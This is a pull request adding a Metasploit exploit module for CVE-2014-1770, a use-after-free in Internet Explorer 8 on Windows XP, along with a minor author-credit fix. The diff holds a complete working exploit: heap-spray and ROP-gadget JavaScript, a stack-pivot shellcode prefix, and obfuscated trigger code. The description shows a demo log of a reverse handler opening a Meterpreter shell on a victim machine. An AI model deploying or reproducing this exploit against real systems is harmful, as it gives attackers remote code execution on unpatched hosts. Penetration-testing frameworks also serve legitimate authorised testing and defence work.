### PR TITLE
Add CVE-2014-1770 Internet Explorer 8 UAF

### DIFF
--- a/modules/exploits/windows/browser/ms14_035_ccaret.rb
+++ b/modules/exploits/windows/browser/ms14_035_ccaret.rb
@@ -1,0 +1,185 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "MS14-035 Microsoft Internet Explorer CCaret Use-After-Free",
+      'Description'    => %q{
+        This module exploits an use-after-free vulnerability in Internet Explorer 8. A CCaret object
+        is created by a SelectAll execCommand, later freed, and used by CCaret::UpdateScreenCaret,
+        which results a crash. It was originally found by Peter Van Eeckhoutte, and was reported to
+        Microsoft on October 11th, 2013. However, the vulnerability was actually already fixed in
+        the September 2013 Patch Tuesday, and was later acknowledged in the MS14-035 advisory.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Peter Vreugdenhil', # Original discovery, provided PoC
+          'sinn3r'             # Metasploit
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2014-1770' ],
+          [ 'MSB', 'MS14-035' ],
+          [ 'BID', '67544' ],
+          [ 'URL', 'https://www.corelan.be/index.php/2014/05/22/on-cve-2014-1770-zdi-14-140-internet-explorer-8-0day/' ]
+        ],
+      'Platform'       => 'win',
+      'Arch'           => ARCH_X86,
+      'BrowserRequirements' =>
+        {
+          :source      => /script|headers/i,
+          :os_name     => Msf::OperatingSystems::WINDOWS,
+          :os_flavor   => Msf::OperatingSystems::WindowsVersions::XP,
+          :ua_name     => Msf::HttpClients::IE,
+          :ua_ver      => '8.0',
+          :mshtml_build => lambda { |ver| ver.to_i.between?(18702, 23515) } # Unpatched until Aug 2013
+        },
+      'DefaultOptions' =>
+        {
+          'InitialAutoRunScript' => 'migrate -f',
+          'Retries'              => false
+        },
+      'Payload'        =>
+        {
+          'BadChars' => "\x00",
+          'Prepend'  => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18 # get teb
+                        "\x83\xC0\x08"             + # add eax, byte 8 # get pointer to stacklimit
+                        "\x8b\x20"                   # mov esp, [eax] # put esp at stacklimit
+        },
+      'Targets'        =>
+        [
+          [ 'Internet Explorer 8 on Windows XP', { } ],
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "May 21 2014",
+      'DefaultTarget'  => 0))
+
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Sending HTML...")
+    send_exploit_html(cli, exploit_template(cli, target_info))
+  end
+
+  def exploit_template(cli, target_info)
+        js = %Q|
+var allocs = new Array();
+function sprayPayload() {
+  // I need this because the default one in ropdb seems broken?
+  var rop_gadgets = "\\ub860\\u77c3";
+  rop_gadgets += "\\ufc01\\uffff";
+  rop_gadgets += "\\ube18\\u77c1";
+  rop_gadgets += "\\u4141\\u4141";
+  rop_gadgets += "\\u362c\\u77c2";
+  rop_gadgets += "\\ud9bb\\u77c5";
+  rop_gadgets += "\\ue071\\u77c2";
+  rop_gadgets += "\\u0d13\\u77c5";
+  rop_gadgets += "\\uffc0\\uffff";
+  rop_gadgets += "\\u8fbc\\u77c5";
+  rop_gadgets += "\\ube18\\u77c1";
+  rop_gadgets += "\\u4141\\u4141";
+  rop_gadgets += "\\u8fbc\\u77c5";
+  rop_gadgets += "\\uee15\\u77c3";
+  rop_gadgets += "\\uee15\\u77c3";
+  rop_gadgets += "\\ueeef\\u77c3";
+  rop_gadgets += "\\ud9bb\\u77c5";
+  rop_gadgets += "\\ua88c\\u77c2";
+  rop_gadgets += "\\u9f92\\u77c3";
+  rop_gadgets += "\\ua184\\u77c3";
+  rop_gadgets += "\\uaacc\\u77c2";
+  rop_gadgets += "\\ub860\\u77c3";
+  rop_gadgets += "\\u1120\\u77c1";
+  rop_gadgets += "\\u2df9\\u77c1";
+  rop_gadgets += "\\u5459\\u77c3";
+
+  var payload = "\\uc481\\ufdff\\uffff";
+  payload += unescape("#{Rex::Text.to_unescape(payload.encoded)}");
+
+  var shellcode = "\\u0ff8\\u23ed\\ufa1a\\u77c4";
+  shellcode += rop_gadgets;
+  shellcode += payload;
+  var junk = "\\u0c0c\\u0c0c";
+  while (junk.length < 0x1000) junk += junk;
+  var data = shellcode;
+  data += junk.substring(0, 0x800-shellcode.length);
+  while (data.length < 0x80000) data += data;
+
+  while (junk.length < 0x1000) junk += junk;
+  for (var i=0; i < 0x400; i++) {
+    var e = document.createElement('div');
+    e.title = data.substring(0, (0x80000-2)/2 );
+    document.body.appendChild(e);
+  }
+}
+
+var boom_cnt = 0;
+function boom() {
+  if (boom_cnt > 4) {
+    for (var i = 0; i < 40; i++)
+    {
+      var dobj = document.createElement('div');
+      dobj.className = "\\u4242\\u4242\\u4242\\u4242\\u4242\\u4242\\u4242\\u4242\\u4242\\u4242\\u4242\\u4242\\u4242\\u4242\\u4242\\u4242\\u4242\\u4242\\u4242\\u4242\\u4242\\u4242\\u4242";
+    }
+    try { document.write('a'); } catch (err) {}
+
+    sprayPayload();
+    for (var i = 0; i < 100; i++)
+    {
+      var dobj = document.createElement('div');
+      dobj.className = "\\u4545\\u4545\\ubf10\\u77c1\\u4545\\u4545\\u1020\\u23ed\\u4fbf\\u77c3\\u1028\\u23ed\\u4545\\u4545\\u4545\\u4545\\u4545\\u4545\\u4545\\u4545\\u4545\\u4545\\u4545";
+      document.appendChild(dobj);
+    }
+  }
+  boom_cnt += 1;
+}
+
+function followrabbit() {
+  try { document.body.contentEditable = 'true'; } catch (err) {}
+  try { document.execCommand('SelectAll'); } catch (err) {}
+}
+
+var goodTiming = 0;
+function main() {
+  if (goodTiming < 6) {
+    try { document.execCommand('InsertInputPassword'); } catch (err) {}
+  }
+  try { document.execCommand('SelectAll'); } catch (err) {}
+  try { document.body.innerHTML += 'a'; } catch (err) {}
+  try { document.contentEditable = 'true'; } catch (err) {}
+  goodTiming += 1;
+}
+    |
+
+    j = Rex::Exploitation::JSObfu.new(js)
+    j.obfuscate
+
+    boom_sym   = j.sym("boom")
+    rabbit_sym = j.sym("followrabbit")
+    main_sym   = j.sym("main")
+
+    %Q|<!DOCTYPE html>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
+
+<script language='javascript'>
+#{j}
+</script>
+</head>
+<body onbeforeeditfocus=eval(#{boom_sym}()); onbeforeactivate=eval(#{rabbit_sym}()); onload=eval(#{main_sym}()); >
+</body>
+</html>
+    |
+  end
+
+end

--- a/modules/exploits/windows/browser/ms14_035_ccaret.rb
+++ b/modules/exploits/windows/browser/ms14_035_ccaret.rb
@@ -23,8 +23,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Peter Vreugdenhil', # Original discovery, provided PoC
-          'sinn3r'             # Metasploit
+          'corelanc0d3r', # Original discovery, provided PoC
+          'sinn3r'        # Metasploit
         ],
       'References'     =>
         [


### PR DESCRIPTION
Verification Steps:
- [ ] Get a IE8 + XP box. Make sure your IE8's build number is between 18702 - 23515
- [ ] Run the exploit, you should get a shell.

Demo:

```
msf exploit(ms14_035_ccaret) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.64:4444 
[*] Using URL: http://0.0.0.0:8080/VRpdzQmbR
[*]  Local IP: http://192.168.1.64:8080/VRpdzQmbR
[*] Server started.
msf exploit(ms14_035_ccaret) > [*] 192.168.1.80     ms14_035_ccaret - Gathering target information.
[*] 192.168.1.80     ms14_035_ccaret - Sending response HTML.
[*] 192.168.1.80     ms14_035_ccaret - Sending HTML...
[*] Sending stage (769536 bytes) to 192.168.1.80
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.80:1061) at 2014-06-23 18:30:07 -0500
[*] Session ID 1 (192.168.1.64:4444 -> 192.168.1.80:1061) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2252)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2896
[+] Successfully migrated to process 
```
